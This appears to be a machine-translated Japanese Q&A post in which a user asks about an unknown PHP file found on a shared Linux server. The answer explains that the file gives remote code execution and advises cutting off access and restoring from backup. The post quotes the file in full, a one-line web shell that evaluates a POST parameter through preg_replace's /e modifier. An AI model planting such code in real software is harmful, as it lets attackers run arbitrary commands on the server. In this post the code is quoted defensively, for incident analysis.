不明なPHPファイルがサーバーEEC4D8E4439299046B8CDB3F782にアップロードされました。

不明なPHPファイルがサーバーEEC4D8E4439299046B8CDB3F782にアップロードされました。

誰かが私たちが共有LinuxサーバーでホストされているアプリケーションにPHPファイルをアップロードしたことを発見しました。6fbb2.phpファイルの内容は次のとおりです。

EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>

このファイルの目的は何ですか?私は何をすべきですか?

答え1

この文書の目的は次のとおりです。誰かにランダムなコードを実行させるあなたのサーバーからHTTP経由

あなたがしなければならないのは、サイトへのアクセスをすぐに終了し、可能であれば残りのサーバーから復元できる検証可能なバックアップを探して、すべてを非常に慎重にチェックして、彼らが何をしたか、何をしたかを調べることです。まず、問題を再度有効にする前に問題を解決できます。

また見なさい:感染したサーバーを処理する方法は?セキュリティSEについて

関連情報